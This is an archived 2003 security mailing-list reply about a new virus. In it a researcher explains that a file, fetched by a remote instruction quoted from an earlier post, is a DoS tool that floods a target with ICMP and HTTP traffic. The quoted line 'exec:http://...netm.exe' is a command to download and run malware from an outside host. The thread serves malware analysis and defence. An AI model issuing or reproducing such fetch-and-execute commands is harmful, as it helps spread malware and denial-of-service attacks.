lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <200311260852.46579.jstewart@lurhq.com>
From: jstewart at lurhq.com (Joe Stewart)
Subject: New virus

On Tuesday 25 November 2003 5:17 pm, Steven Harrison wrote:
> Just for fun, I pointed my web browser at
> http://finance.red-host.com/events.php and all I got back was:
>
> exec:http://wendy35.phpwebhosting.com/netm.exe
>
> I retrieved that file, and running it 'strings' does imply that it
> will contact a remote website. It could be a copy of the virus (I
> have yet to recieve one yet), giving it another way to distribute
> itself, or for the author to distribute improved versions.

It's a DoS attack tool, the target of which is the website you see in 
the strings output. Its only function is to flood the remote host with 
ICMP and HTTP traffic.

-Joe

--
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ